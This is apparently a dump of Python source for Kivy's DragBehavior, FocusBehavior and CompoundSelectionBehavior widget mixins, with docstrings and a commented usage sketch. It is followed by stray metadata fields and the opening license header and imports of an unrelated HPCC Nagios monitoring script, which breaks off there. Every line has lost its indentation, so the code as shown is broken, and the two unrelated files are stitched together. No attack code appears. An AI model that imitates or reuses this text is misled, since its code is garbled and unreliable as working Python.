def _get_uid(self, prefix='sv'):
return '{0}.{1}'.format(prefix, self.uid)
def on_touch_down(self, touch):
xx, yy, w, h = self.drag_rectangle
x, y = touch.pos
if not self.collide_point(x, y):
touch.ud[self._get_uid('svavoid')] = True
return super(DragBehavior, self).on_touch_down(touch)
if self._drag_touch or ('button' in touch.profile and
touch.button.startswith('scroll')) or\
not ((xx < x <= xx + w) and (yy < y <= yy + h)):
return super(DragBehavior, self).on_touch_down(touch)
# no mouse scrolling, so the user is going to drag with this touch.
self._drag_touch = touch
uid = self._get_uid()
touch.grab(self)
touch.ud[uid] = {
'mode': 'unknown',
'dx': 0,
'dy': 0}
Clock.schedule_once(self._change_touch_mode,
self.drag_timeout / 1000.)
return True
def on_touch_move(self, touch):
if self._get_uid('svavoid') in touch.ud or\
self._drag_touch is not touch:
return super(DragBehavior, self).on_touch_move(touch) or\
self._get_uid() in touch.ud
if touch.grab_current is not self:
return True
uid = self._get_uid()
ud = touch.ud[uid]
mode = ud['mode']
if mode == 'unknown':
ud['dx'] += abs(touch.dx)
ud['dy'] += abs(touch.dy)
if ud['dx'] > sp(self.drag_distance):
mode = 'drag'
if ud['dy'] > sp(self.drag_distance):
mode = 'drag'
ud['mode'] = mode
if mode == 'drag':
self.x += touch.dx
self.y += touch.dy
return True
def on_touch_up(self, touch):
if self._get_uid('svavoid') in touch.ud:
return super(DragBehavior, self).on_touch_up(touch)
if self._drag_touch and self in [x() for x in touch.grab_list]:
touch.ungrab(self)
self._drag_touch = None
ud = touch.ud[self._get_uid()]
if ud['mode'] == 'unknown':
super(DragBehavior, self).on_touch_down(touch)
Clock.schedule_once(partial(self._do_touch_up, touch), .1)
else:
if self._drag_touch is not touch:
super(DragBehavior, self).on_touch_up(touch)
return self._get_uid() in touch.ud
def _do_touch_up(self, touch, *largs):
super(DragBehavior, self).on_touch_up(touch)
# don't forget about grab event!
for x in touch.grab_list[:]:
touch.grab_list.remove(x)
x = x()
if not x:
continue
touch.grab_current = x
super(DragBehavior, self).on_touch_up(touch)
touch.grab_current = None
def _change_touch_mode(self, *largs):
if not self._drag_touch:
return
uid = self._get_uid()
touch = self._drag_touch
ud = touch.ud[uid]
if ud['mode'] != 'unknown':
return
touch.ungrab(self)
self._drag_touch = None
super(DragBehavior, self).on_touch_down(touch)
return
class FocusBehavior(object):
'''Implements keyboard focus behavior. When combined with other
FocusBehavior widgets it allows one to cycle focus among them by pressing
tab. In addition, upon gaining focus the instance will automatically
receive keyboard input.
Focus, very different from selection, is intimately tied to the keyboard;
each keyboard can focus on zero or one widgets, and each widget can only
have the focus of one keyboard. However, multiple keyboards can focus
simultaneously on different widgets. When escape is hit, the widget having
the focus of that keyboard will de-focus.
In essence, focus is implemented as a doubly linked list, where each
node holds a (weak) reference to the instance before it and after it,
as visualized when cycling through the nodes using tab (forward) or
shift+tab (backward). If previous or next widget is not specified,
:attr:`focus_next` and :attr:`focus_previous` defaults to `None`,
which means that the children list and parents are walked to find
the next focusable widget, unless :attr:`focus_next` or
:attr:`focus_previous` is set to the `StopIteration` class, in which case
focus stops there.
For example, to cycle focus between :class:`~kivy.uix.button.Button`
elements of a :class:`~kivy.uix.gridlayout.GridLayout`::
class FocusButton(FocusBehavior, Button):
pass
grid = GridLayout(cols=4)
for i in range(40):
grid.add_widget(FocusButton(text=str(i)))
# clicking on a widget will activate focus, and tab can now be used
# to cycle through
.. versionadded:: 1.9.0
.. warning::
This code is still experimental, and its API is subject to change in a
future version.
'''
_requested_keyboard = False
_keyboard = ObjectProperty(None, allownone=True)
_keyboards = {}
ignored_touch = []
'''A list of touches that should not be used to defocus. After on_touch_up,
every touch that is not in :attr:`ignored_touch` will defocus all the
focused widgets if the config keyboard mode is not multi. Touches on
focusable widgets that were used to focus are automatically added here.
Example usage::
class Unfocusable(Widget):
def on_touch_down(self, touch):
if self.collide_point(*touch.pos):
FocusBehavior.ignored_touch.append(touch)
Notice that you need to access this as class, not instance variable.
'''
def _set_keyboard(self, value):
focus = self.focus
keyboard = self._keyboard
keyboards = FocusBehavior._keyboards
if keyboard:
self.focus = False # this'll unbind
if self._keyboard: # remove assigned keyboard from dict
del keyboards[keyboard]
if value and not value in keyboards:
keyboards[value] = None
self._keyboard = value
self.focus = focus
def _get_keyboard(self):
return self._keyboard
keyboard = AliasProperty(_get_keyboard, _set_keyboard,
bind=('_keyboard', ))
'''The keyboard to bind, or bound to the widget when focused.
When None, a keyboard is requested and released whenever the widget comes
into and out of focus. If not None, it must be a keyboard, which gets
bound and unbound from the widget whenever it's in or out of focus. It is
useful only when more than one keyboard is available, so it is recommended
to be set to None when only one keyboard is available
If more than one keyboard is available, whenever an instance gets focused
a new keyboard will be requested if None. Unless the other instances lose
focus (e.g. if tab was used), a new keyboard will appear. When this is
undesired, the keyboard property can be used. For example, if there are
two users with two keyboards, then each keyboard can be assigned to
different groups of instances of FocusBehavior, ensuring that within
each group, only one FocusBehavior will have focus, and will receive input
from the correct keyboard. see `keyboard_mode` in :mod:`~kivy.config` for
information on the keyboard modes.
:attr:`keyboard` is a :class:`~kivy.properties.AliasProperty`, defaults to
None.
.. note::
When Config's `keyboard_mode` is multi, each new touch is considered
a touch by a different user and will focus (if clicked on a
focusable) with a new keyboard. Already focused elements will not lose
their focus (even if clicked on an unfocusable).
.. note:
If the keyboard property is set, that keyboard will be used when the
instance gets focused. If widgets with different keyboards are linked
through :attr:`focus_next` and :attr:`focus_previous`, then as they are
tabbed through, different keyboards will become active. Therefore,
typically it's undesirable to link instances which are assigned
different keyboards.
.. note:
When an instance has focus, setting keyboard to None will remove the
current keyboard, but will then try to get a keyboard back. It is
better to set :attr:`focus` to False.
.. warning:
When assigning a keyboard, the keyboard must not be released while
it is still assigned to an instance. Similarly, the keyboard created
by the instance on focus and assigned to :attr:`keyboard` if None,
will be released by the instance when the instance loses focus.
Therefore, it is not safe to assign this keyboard to another instance's
:attr:`keyboard`.
'''
is_focusable = BooleanProperty(_is_desktop)
'''Whether the instance can become focused. If focused, it'll lose focus
when set to False.
:attr:`is_focusable` is a :class:`~kivy.properties.BooleanProperty`,
defaults to True on a desktop (i.e. desktop is True in
:mod:`~kivy.config`), False otherwise.
'''
focus = BooleanProperty(False)
'''Whether the instance currently has focus.
Setting it to True, will bind to and/or request the keyboard, and input
will be forwarded to the instance. Setting it to False, will unbind
and/or release the keyboard. For a given keyboard, only one widget can
have its focus, so focusing one will automatically unfocus the other
instance holding its focus.
:attr:`focus` is a :class:`~kivy.properties.BooleanProperty`, defaults to
False.
'''
focused = focus
'''An alias of :attr:`focus`.
:attr:`focused` is a :class:`~kivy.properties.BooleanProperty`, defaults to
False.
.. warning::
:attr:`focused` is an alias of :attr:`focus` and will be removed in
2.0.0.
'''
def _set_on_focus_next(self, instance, value):
''' If changing code, ensure following code is not infinite loop:
widget.focus_next = widget
widget.focus_previous = widget
widget.focus_previous = widget2
'''
next = self._old_focus_next
if next is value: # prevent infinite loop
return
if isinstance(next, FocusBehavior):
next.focus_previous = None
self._old_focus_next = value
if value is None or value is StopIteration:
return
if not isinstance(value, FocusBehavior):
raise ValueError('focus_next accepts only objects based'
' on FocusBehavior, or the StopIteration class.')
value.focus_previous = self
focus_next = ObjectProperty(None, allownone=True)
'''The :class:`FocusBehavior` instance to acquire focus when
tab is pressed when this instance has focus, if not `None` or
`'StopIteration'`.
When tab is pressed, focus cycles through all the :class:`FocusBehavior`
widgets that are linked through :attr:`focus_next` and are focusable. If
:attr:`focus_next` is `None`, it instead walks the children lists to find
the next focusable widget. Finally, if :attr:`focus_next` is
the `StopIteration` class, focus won't move forward, but end here.
.. note:
Setting :attr:`focus_next` automatically sets :attr:`focus_previous`
of the other instance to point to this instance, if not None or
`StopIteration`. Similarly, if it wasn't None or `StopIteration`, it
also sets the :attr:`focus_previous` property of the instance
previously in :attr:`focus_next` to `None`. Therefore, it is only
required to set one side of the :attr:`focus_previous`,
:attr:`focus_next`, links since the other side will be set
automatically.
:attr:`focus_next` is a :class:`~kivy.properties.ObjectProperty`, defaults
to `None`.
'''
def _set_on_focus_previous(self, instance, value):
prev = self._old_focus_previous
if prev is value:
return
if isinstance(prev, FocusBehavior):
prev.focus_next = None
self._old_focus_previous = value
if value is None or value is StopIteration:
return
if not isinstance(value, FocusBehavior):
raise ValueError('focus_previous accepts only objects based'
' on FocusBehavior, or the StopIteration class.')
value.focus_next = self
focus_previous = ObjectProperty(None, allownone=True)
'''The :class:`FocusBehavior` instance to acquire focus when
shift+tab is pressed on this instance, if not None or `StopIteration`.
When shift+tab is pressed, focus cycles through all the
:class:`FocusBehavior` widgets that are linked through
:attr:`focus_previous` and are focusable. If :attr:`focus_previous` is
`None`, it instead walks the children tree to find the
previous focusable widget. Finally, if :attr:`focus_previous` is the
`StopIteration` class, focus won't move backward, but end here.
.. note:
Setting :attr:`focus_previous` automatically sets :attr:`focus_next`
of the other instance to point to this instance, if not None or
`StopIteration`. Similarly, if it wasn't None or `StopIteration`, it
also sets the :attr:`focus_next` property of the instance previously in
:attr:`focus_previous` to `None`. Therefore, it is only required
to set one side of the :attr:`focus_previous`, :attr:`focus_next`,
links since the other side will be set automatically.
:attr:`focus_previous` is a :class:`~kivy.properties.ObjectProperty`,
defaults to `None`.
'''
keyboard_mode = OptionProperty('auto', options=('auto', 'managed'))
'''How the keyboard visibility should be managed (auto will have standard
behaviour to show/hide on focus, managed requires setting keyboard_visible
manually, or calling the helper functions ``show_keyboard()``
and ``hide_keyboard()``.
:attr:`keyboard_mode` is an :class:`~kivy.properties.OptionProperty` and
defaults to 'auto'. Can be one of 'auto' or 'managed'.
'''
input_type = OptionProperty('text', options=('text', 'number', 'url',
'mail', 'datetime', 'tel',
'address'))
'''The kind of input keyboard to request.
.. versionadded:: 1.8.0
:attr:`input_type` is an :class:`~kivy.properties.OptionProperty` and
defaults to 'text'. Can be one of 'text', 'number', 'url', 'mail',
'datetime', 'tel', 'address'.
'''
unfocus_on_touch = BooleanProperty(_keyboard_mode not in
('multi', 'systemandmulti'))
'''Whether an instance should lose focus when clicked outside the instance.
When a user clicks on a widget that is focus aware and shares the same
keyboard as this widget (which, in the case of only one keyboard, means
all focus aware widgets), then as the other widget gains focus, this
widget loses focus. In addition to that, if this property is `True`,
clicking on any widget other than this widget will remove focus from this
widget.
:attr:`unfocus_on_touch` is a :class:`~kivy.properties.BooleanProperty`,
defaults to `False` if the `keyboard_mode` in :attr:`~kivy.config.Config`
is `'multi'` or `'systemandmulti'`, otherwise it defaults to `True`.
'''
def __init__(self, **kwargs):
self._old_focus_next = None
self._old_focus_previous = None
super(FocusBehavior, self).__init__(**kwargs)
self._keyboard_mode = _keyboard_mode
fbind = self.fbind
fbind('focus', self._on_focus)
fbind('disabled', self._on_focusable)
fbind('is_focusable', self._on_focusable)
fbind('focus_next', self._set_on_focus_next)
fbind('focus_previous', self._set_on_focus_previous)
def _on_focusable(self, instance, value):
if self.disabled or not self.is_focusable:
self.focus = False
def _on_focus(self, instance, value, *largs):
if self.keyboard_mode == 'auto':
if value:
self._bind_keyboard()
else:
self._unbind_keyboard()
def _ensure_keyboard(self):
if self._keyboard is None:
self._requested_keyboard = True
keyboard = self._keyboard =\
EventLoop.window.request_keyboard(
self._keyboard_released, self, input_type=self.input_type)
keyboards = FocusBehavior._keyboards
if keyboard not in keyboards:
keyboards[keyboard] = None
def _bind_keyboard(self):
self._ensure_keyboard()
keyboard = self._keyboard
if not keyboard or self.disabled or not self.is_focusable:
self.focus = False
return
keyboards = FocusBehavior._keyboards
old_focus = keyboards[keyboard] # keyboard should be in dict
if old_focus:
old_focus.focus = False
# keyboard shouldn't have been released here, see keyboard warning
keyboards[keyboard] = self
keyboard.bind(on_key_down=self.keyboard_on_key_down,
on_key_up=self.keyboard_on_key_up,
on_textinput=self.keyboard_on_textinput)
def _unbind_keyboard(self):
keyboard = self._keyboard
if keyboard:
keyboard.unbind(on_key_down=self.keyboard_on_key_down,
on_key_up=self.keyboard_on_key_up,
on_textinput=self.keyboard_on_textinput)
if self._requested_keyboard:
keyboard.release()
self._keyboard = None
self._requested_keyboard = False
del FocusBehavior._keyboards[keyboard]
else:
FocusBehavior._keyboards[keyboard] = None
def keyboard_on_textinput(self, window, text):
pass
def _keyboard_released(self):
self.focus = False
def on_touch_down(self, touch):
if not self.collide_point(*touch.pos):
return
if (not self.disabled and self.is_focusable and
('button' not in touch.profile or
not touch.button.startswith('scroll'))):
self.focus = True
FocusBehavior.ignored_touch.append(touch)
return super(FocusBehavior, self).on_touch_down(touch)
@staticmethod
def _handle_post_on_touch_up(touch):
''' Called by window after each touch has finished.
'''
touches = FocusBehavior.ignored_touch
if touch in touches:
touches.remove(touch)
return
for focusable in list(FocusBehavior._keyboards.values()):
if focusable is None or not focusable.unfocus_on_touch:
continue
focusable.focus = False
def _get_focus_next(self, focus_dir):
current = self
walk_tree = 'walk' if focus_dir == 'focus_next' else 'walk_reverse'
while 1:
# if we hit a focusable, walk through focus_xxx
while getattr(current, focus_dir) is not None:
current = getattr(current, focus_dir)
if current is self or current is StopIteration:
return None # make sure we don't loop forever
if current.is_focusable and not current.disabled:
return current
# hit unfocusable, walk widget tree
itr = getattr(current, walk_tree)(loopback=True)
if focus_dir == 'focus_next':
next(itr) # current is returned first when walking forward
for current in itr:
if isinstance(current, FocusBehavior):
break
# why did we stop
if isinstance(current, FocusBehavior):
if current is self:
return None
if current.is_focusable and not current.disabled:
return current
else:
return None
def keyboard_on_key_down(self, window, keycode, text, modifiers):
'''The method bound to the keyboard when the instance has focus.
When the instance becomes focused, this method is bound to the
keyboard and will be called for every input press. The parameters are
the same as :meth:`kivy.core.window.WindowBase.on_key_down`.
When overwriting the method in the derived widget, super should be
called to enable tab cycling. If the derived widget wishes to use tab
for its own purposes, it can call super at the end after it is done if
it didn't consume tab.
Similar to other keyboard functions, it should return True if the
key was consumed.
'''
if keycode[1] == 'tab': # deal with cycle
if ['shift'] == modifiers:
next = self._get_focus_next('focus_previous')
else:
next = self._get_focus_next('focus_next')
if next:
self.focus = False
next.focus = True
return True
return False
def keyboard_on_key_up(self, window, keycode):
'''The method bound to the keyboard when the instance has focus.
When the instance becomes focused, this method is bound to the
keyboard and will be called for every input release. The parameters are
the same as :meth:`kivy.core.window.WindowBase.on_key_up`.
When overwriting the method in the derived widget, super should be
called to enable de-focusing on escape. If the derived widget wishes
to use escape for its own purposes, it can call super at the end after
it is done if it didn't consume escape.
See :meth:`on_key_down`
'''
if keycode[1] == 'escape':
self.focus = False
return True
return False
def show_keyboard(self):
'''
Convenience function to show the keyboard in managed mode.
'''
if self.keyboard_mode == 'managed':
self._bind_keyboard()
def hide_keyboard(self):
'''
Convenience function to hide the keyboard in managed mode.
'''
if self.keyboard_mode == 'managed':
self._unbind_keyboard()
class CompoundSelectionBehavior(object):
'''Selection behavior implements the logic behind keyboard and touch
selection of selectable widgets managed by the derived widget.
For example, it could be combined with a
:class:`~kivy.uix.gridlayout.GridLayout` to add selection to the layout.
At its core, it keeps a dynamic list of widgets that can be selected.
Then, as the touches and keyboard input are passed in, it selects one or
more of the widgets based on these inputs. For example, it uses the mouse
scroll and keyboard up/down buttons to scroll through the list of widgets.
Multiselection can also be achieved using the keyboard shift and ctrl keys.
Finally, in addition to the up/down type keyboard inputs, it can also
accept letters from the keyboard to be used to select nodes with
associated strings that start with those letters, similar to how files
are selected by a file browser.
When the controller needs to select a node it calls :meth:`select_node` and
:meth:`deselect_node`. Therefore, they must be overwritten in order to affect
the selected nodes. By default, the class doesn't listen to keyboard and
touch events, therefore, the derived widget must call
:meth:`select_with_touch`, :meth:`select_with_key_down`, and
:meth:`select_with_key_up` on events that it wants to pass on for selection
purposes.
For example, to add selection to a grid layout which will contain
:class:`~kivy.uix.Button` widgets::
class SelectableGrid(CompoundSelectionBehavior, GridLayout):
def __init__(self, **kwargs):
super(SelectableGrid, self).__init__(**kwargs)
keyboard = Window.request_keyboard(None, self)
keyboard.bind(on_key_down=self.select_with_key_down,
on_key_up=self.select_with_key_up)
def select_node(self, node):
node.background_color = (1, 0, 0, 1)
return super(SelectableGrid, self).select_node(node)
def deselect_node(self, node):
node.background_color = (1, 1, 1, 1)
super(SelectableGrid, self).deselect_node(node)
Then, for each button added to the layout, bind on_touch_down of the button
to :meth:`select_with_touch` to pass on the touch events.
.. versionadded:: 1.9.0
.. warning::
This code is still experimental, and its API is subject to change in a
future version.
'''
selected_nodes = ListProperty([])
'''The list of selected nodes.
.. note:
Multiple nodes can be selected right after another using e.g. the
keyboard, so when listening to :attr:`selected_nodes` one should be
aware of this.
:attr:`selected_nodes` is a :class:`~kivy.properties.ListProperty` and
defaults to the empty list, []. It is read-only and should not be modified.
'''
touch_multiselect = BooleanProperty(False)
'''A special touch mode which determines whether touch events, as
processed with :meth:`select_with_touch`, will add to the selection the
currently touched node, or if it will clear the selection before adding the
node. This allows the selection of multiple nodes by simply touching them.
This is different than :attr:`multiselect`, because when this is True
simply touching an unselected node will select it, even if e.g. ctrl is not
pressed. If this is False, however, ctrl is required to be held in order to
add to selection when :attr:`multiselect` is True.
.. note::
:attr:`multiselect`, when False, will disable
:attr:`touch_multiselect`.
:attr:`touch_multiselect` is a :class:`~kivy.properties.BooleanProperty`,
defaults to False.
'''
multiselect = BooleanProperty(False)
'''Determines whether multiple nodes can be selected. If enabled, keyboard
shift and ctrl selection, optionally combined with touch, for example, will
be able to select multiple widgets in the normally expected manner.
This dominates :attr:`touch_multiselect` when False.
:attr:`multiselect` is a :class:`~kivy.properties.BooleanProperty`
, defaults to False.
'''
keyboard_select = BooleanProperty(True)
''' Whether the keyboard can be used for selection. If False, keyboard
inputs will be ignored.
:attr:`keyboard_select` is a :class:`~kivy.properties.BooleanProperty`
, defaults to True.
'''
page_count = NumericProperty(10)
'''Determines by how much the selected node is moved up or down, relative
to position of the last selected node, when pageup (or pagedown) is
pressed.
:attr:`page_count` is a :class:`~kivy.properties.NumericProperty`,
defaults to 10.
'''
up_count = NumericProperty(1)
'''Determines by how much the selected node is moved up or down, relative
to position of the last selected node, when the up (or down) arrow on the
keyboard is pressed.
:attr:`up_count` is a :class:`~kivy.properties.NumericProperty`,
defaults to 1.
'''
right_count = NumericProperty(1)
'''Determines by how much the selected node is moved up or down, relative
to position of the last selected node, when the right (or left) arrow on
the keyboard is pressed.
:attr:`right_count` is a :class:`~kivy.properties.NumericProperty`,
defaults to 1.
'''
scroll_count = NumericProperty(0)
'''Determines by how much the selected node is moved up or down, relative
to position of the last selected node, when the mouse scroll wheel is
scrolled.
:attr:`scroll_count` is a :class:`~kivy.properties.NumericProperty`,
defaults to 0.
'''
_anchor = None # the last anchor node selected (e.g. shift relative node)
# the idx may be out of sync
_anchor_idx = 0 # cache indices in case the list hasn't changed
_last_selected_node = None # the absolute last node selected
_last_node_idx = 0
_ctrl_down = False # if it's pressed - for e.g. shift selection
_shift_down = False
# holds str used to find node, e.g. if word is typed. passed to goto_node
_word_filter = ''
_last_key_time = 0 # time since last press, for finding whole strs in node
_printable = set(string.printable)
_key_list = [] # keys that are already pressed, to not press continuously
_offset_counts = {} # cache of counts for faster access
def __init__(self, **kwargs):
super(CompoundSelectionBehavior, self).__init__(**kwargs)
def ensure_single_select(*l):
if (not self.multiselect) and len(self.selected_nodes) > 1:
self.clear_selection()
update_counts = self._update_counts
update_counts()
fbind = self.fbind
fbind('multiselect', ensure_single_select)
fbind('page_count', update_counts)
fbind('up_count', update_counts)
fbind('right_count', update_counts)
fbind('scroll_count', update_counts)
def select_with_touch(self, node, touch=None):
'''(internal) Processes a touch on the node. This should be called by
the derived widget when a node is touched and is to be used for
selection. Depending on the keyboard keys pressed and the
configuration, it could select or deselect this and other nodes in the
selectable nodes list, :meth:`get_selectable_nodes`.
:Parameters:
`node`
The node that received the touch. Can be None for a scroll
type touch.
`touch`
Optionally, the touch. Defaults to None.
:Returns:
bool, True if the touch was used, False otherwise.
'''
multi = self.multiselect
multiselect = multi and (self._ctrl_down or self.touch_multiselect)
range_select = multi and self._shift_down
if touch and 'button' in touch.profile and touch.button in\
('scrollup', 'scrolldown', 'scrollleft', 'scrollright'):
node_src, idx_src = self._reslove_last_node()
node, idx = self.goto_node(touch.button, node_src, idx_src)
if node == node_src:
return False
if range_select:
self._select_range(multiselect, True, node, idx)
else:
if not multiselect:
self.clear_selection()
self.select_node(node)
return True
if node is None:
return False
if (node in self.selected_nodes and (not range_select)): # selected
if multiselect:
self.deselect_node(node)
else:
self.clear_selection()
self.select_node(node)
elif range_select:
# keep anchor only if not multiselect (ctrl-type selection)
self._select_range(multiselect, not multiselect, node, 0)
else: # it's not selected at this point
if not multiselect:
self.clear_selection()
self.select_node(node)
return True
def select_with_key_down(self, keyboard, scancode, codepoint, modifiers,
**kwargs):
'''Processes a key press. This is called when a key press is to be used
for selection. Depending on the keyboard keys pressed and the
configuration, it could select or deselect nodes or node ranges
from the selectable nodes list, :meth:`get_selectable_nodes`.
The parameters are such that it could be bound directly to the
on_key_down event of a keyboard. Therefore, it is safe to be called
repeatedly when the key is held down as is done by the keyboard.
:Returns:
bool, True if the keypress was used, False otherwise.
'''
if not self.keyboard_select:
return False
keys = self._key_list
multi = self.multiselect
node_src, idx_src = self._reslove_last_node()
if scancode[1] == 'shift':
self._shift_down = True
elif scancode[1] in ('ctrl', 'lctrl', 'rctrl'):
self._ctrl_down = True
elif (multi and 'ctrl' in modifiers and scancode[1] in ('a', 'A')
and scancode[1] not in keys):
sister_nodes = self.get_selectable_nodes()
select = self.select_node
for node in sister_nodes:
select(node)
keys.append(scancode[1])
else:
if scancode[1] in self._printable:
if time() - self._last_key_time <= 1.:
self._word_filter += scancode[1]
else:
self._word_filter = scancode[1]
self._last_key_time = time()
node, idx = self.goto_node(self._word_filter, node_src,
idx_src)
else:
node, idx = self.goto_node(scancode[1], node_src, idx_src)
if node == node_src:
return False
multiselect = multi and 'ctrl' in modifiers
if multi and 'shift' in modifiers:
self._select_range(multiselect, True, node, idx)
else:
if not multiselect:
self.clear_selection()
self.select_node(node)
return True
return False
def select_with_key_up(self, keyboard, scancode, **kwargs):
'''(internal) Processes a key release. This must be called by the
derived widget when a key for which :meth:`select_with_key_down` returned
True is released.
The parameters are such that it could be bound directly to the
on_key_up event of a keyboard.
:Returns:
bool, True if the key release was used, False otherwise.
'''
if scancode[1] == 'shift':
self._shift_down = False
elif scancode[1] in ('ctrl', 'lctrl', 'rctrl'):
self._ctrl_down = False
else:
try:
self._key_list.remove(scancode[1])
return True
except ValueError:
return False
return True
def _update_counts(self, *largs):
# doesn't invert indices here
pc = self.page_count
uc = self.up_count
rc = self.right_count
sc = self.scroll_count
self._offset_counts = {'pageup': -pc, 'pagedown': pc, 'up': -uc,
'down': uc, 'right': rc, 'left': -rc, 'scrollup': sc,
'scrolldown': -sc, 'scrollright': -sc, 'scrollleft': sc}
def _reslove_last_node(self):
# for offset selection, we have an anchor, and we select everything
# between anchor and added offset relative to last node
sister_nodes = self.get_selectable_nodes()
if not len(sister_nodes):
return None, 0
last_node = self._last_selected_node
last_idx = self._last_node_idx
end = len(sister_nodes) - 1
if last_node is None:
last_node = self._anchor
last_idx = self._anchor_idx
if last_node is None:
return sister_nodes[end], end
if last_idx > end or sister_nodes[last_idx] != last_node:
try:
return last_node, sister_nodes.index(last_node)
except ValueError:
return sister_nodes[end], end
return last_node, last_idx
def _select_range(self, multiselect, keep_anchor, node, idx):
'''Selects a range between self._anchor and node or idx.
If multiselect, it'll add to selection, otherwise it will unselect
everything before selecting the range. This is only called if
self.multiselect is True.
If keep_anchor is False, the anchor is moved to node. This should
always be True for keyboard selection.
'''
select = self.select_node
sister_nodes = self.get_selectable_nodes()
end = len(sister_nodes) - 1
last_node = self._anchor
last_idx = self._anchor_idx
if last_node is None:
last_idx = end
last_node = sister_nodes[end]
else:
if last_idx > end or sister_nodes[last_idx] != last_node:
try:
last_idx = sister_nodes.index(last_node)
except ValueError:
# list changed - cannot do select across them
return
if idx > end or sister_nodes[idx] != node:
try: # just in case
idx = sister_nodes.index(node)
except ValueError:
return
if last_idx > idx:
last_idx, idx = idx, last_idx
if not multiselect:
self.clear_selection()
for item in sister_nodes[last_idx:idx + 1]:
select(item)
if keep_anchor:
self._anchor = last_node
self._anchor_idx = last_idx
else:
self._anchor = node # in case idx was reversed, reset
self._anchor_idx = idx
self._last_selected_node = node
self._last_node_idx = idx
def clear_selection(self):
''' Deselects all the currently selected nodes.
'''
# keep the anchor and last selected node
deselect = self.deselect_node
nodes = self.selected_nodes
# empty beforehand so lookup in deselect will be fast
self.selected_nodes = []
for node in nodes:
deselect(node)
def get_selectable_nodes(self):
'''(internal) Returns a list of the nodes that can be selected. It can
be overridden by the derived widget to return the correct list.
This list is used to determine which nodes to select with group
selection. E.g. the last element in the list will be selected when
home is pressed, pagedown will move (or add to, if shift is held) the
selection from the current position by negative :attr:`page_count`
nodes starting from the position of the currently selected node in
this list and so on. Still, nodes can be selected even if they are not
in this list.
.. note::
It is safe to dynamically change this list including removing,
adding, or re-arranging its elements. Nodes can be selected even
if they are not on this list. And selected nodes removed from the
list will remain selected until :meth:`deselect_node` is called.
.. warning::
Layouts display their children in reverse order. That is, the
contents of :attr:`~kivy.uix.widget.Widget.children` is displayed
from right to left, bottom to top. Therefore, internally, the
indices of the elements returned by this function are reversed to
make it work by default for most layouts, so that e.g. home, although
it selects the last element of this list, visually selects the first
element when counting from top to bottom and left to right. If this
behavior is not desired, a reversed list should be returned instead.
Defaults to returning :attr:`~kivy.uix.widget.Widget.children`.
'''
return self.children
def goto_node(self, key, last_node, last_node_idx):
'''(internal) Used by the controller to get the node at the position
indicated by key. The key can be keyboard inputs, e.g. pageup,
or scroll inputs from the mouse scroll wheel, e.g. scrollup.
Last node is the last node selected and is used to find the resulting
node. For example, if the key is up, the returned node is one node
up from the last node.
It can be overridden by the derived widget.
:Parameters:
`key`
str, the string used to find the desired node. It can be any
of the keyboard keys, as well as the mouse scrollup,
scrolldown, scrollright, and scrollleft strings. If letters
are typed in quick succession, the letters will be combined
before it's passed in as key and can be used to find nodes that
have an associated string that starts with those letters.
`last_node`
The last node that was selected.
`last_node_idx`
The cached index of the last node selected in the
:meth:`get_selectable_nodes` list. If the list hasn't changed
it saves having to look up the index of `last_node` in that
list.
:Returns:
tuple, the node targeted by key and its index in the
:meth:`get_selectable_nodes` list. Returning
`(last_node, last_node_idx)` indicates a node wasn't found.
'''
sister_nodes = self.get_selectable_nodes()
end = len(sister_nodes) - 1
counts = self._offset_counts
if end == -1:
return last_node, last_node_idx
if last_node_idx > end or sister_nodes[last_node_idx] != last_node:
try: # just in case
last_node_idx = sister_nodes.index(last_node)
except ValueError:
return last_node, last_node_idx
try:
idx = max(min(-counts[key] + last_node_idx, end), 0)
return sister_nodes[idx], idx
except KeyError:
pass
if key == 'home':
return sister_nodes[end], end
elif key == 'end':
return sister_nodes[0], 0
else:
return last_node, last_node_idx
def select_node(self, node):
''' Selects a node.
It is called by the controller when it selects a node and can be
called from the outside to select a node directly. The derived widget
should override this method and change the node to its selected state
when this is called.
:Parameters:
`node`
The node to be selected.
:Returns:
bool, True if the node was selected, False otherwise.
.. warning::
This method must be called by the derived widget using super if it
is overwritten.
'''
nodes = self.selected_nodes
if (not self.multiselect) and len(nodes):
self.clear_selection()
if node not in nodes:
nodes.append(node)
self._anchor = node
self._last_selected_node = node
return True
def deselect_node(self, node):
''' Deselects a possibly selected node.
It is called by the controller when it deselects a node and can also
be called from the outside to deselect a node directly. The derived
widget should override this method and change the node to its
unselected state when this is called.
:Parameters:
`node`
The node to be deselected.
.. warning::
This method must be called by the derived widget using super if it
is overwritten.
'''
try:
self.selected_nodes.remove(node)
except ValueError:
pass
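# --- Editor's illustrative sketch (not part of the original Kivy source) ---
# A derived widget typically mixes CompoundSelectionBehavior into a layout,
# forwards keyboard and touch events to the behavior, and overrides
# select_node/deselect_node to update the visual state. The class and the
# assumption that children are Buttons (with a background_color) are
# hypothetical; this is a minimal sketch, not a verified implementation.
#
#     from kivy.uix.behaviors import CompoundSelectionBehavior
#     from kivy.uix.gridlayout import GridLayout
#     from kivy.core.window import Window
#
#     class SelectableGrid(CompoundSelectionBehavior, GridLayout):
#         def __init__(self, **kwargs):
#             super(SelectableGrid, self).__init__(**kwargs)
#             keyboard = Window.request_keyboard(None, self)
#             keyboard.bind(on_key_down=self.select_with_key_down,
#                           on_key_up=self.select_with_key_up)
#
#         def on_touch_down(self, touch):
#             if super(SelectableGrid, self).on_touch_down(touch):
#                 return True
#             if self.collide_point(*touch.pos):
#                 # resolve the child under the touch and hand it to the behavior
#                 for child in self.children:
#                     if child.collide_point(*touch.pos):
#                         return self.select_with_touch(child, touch)
#             return False
#
#         def select_node(self, node):
#             node.background_color = (1, 0, 0, 1)   # mark as selected
#             return super(SelectableGrid, self).select_node(node)
#
#         def deselect_node(self, node):
#             node.background_color = (1, 1, 1, 1)   # restore
#             super(SelectableGrid, self).deselect_node(node)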
|
mit
| 289,419,205,945,449,800
| 36.926099
| 79
| 0.616238
| false
| 4.279543
| false
| false
| false
|
hpcc-systems/nagios-monitoring
|
hpcc-nagios-tools/hpcc_centralized_nagios.py
|
1
|
24447
|
#!/usr/bin/env python3
##############################################################################
# HPCC SYSTEMS software Copyright (C) 2015 HPCC Systems.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import lxml.etree as ET
import subprocess
import paramiko
import getpass
import sys
import os
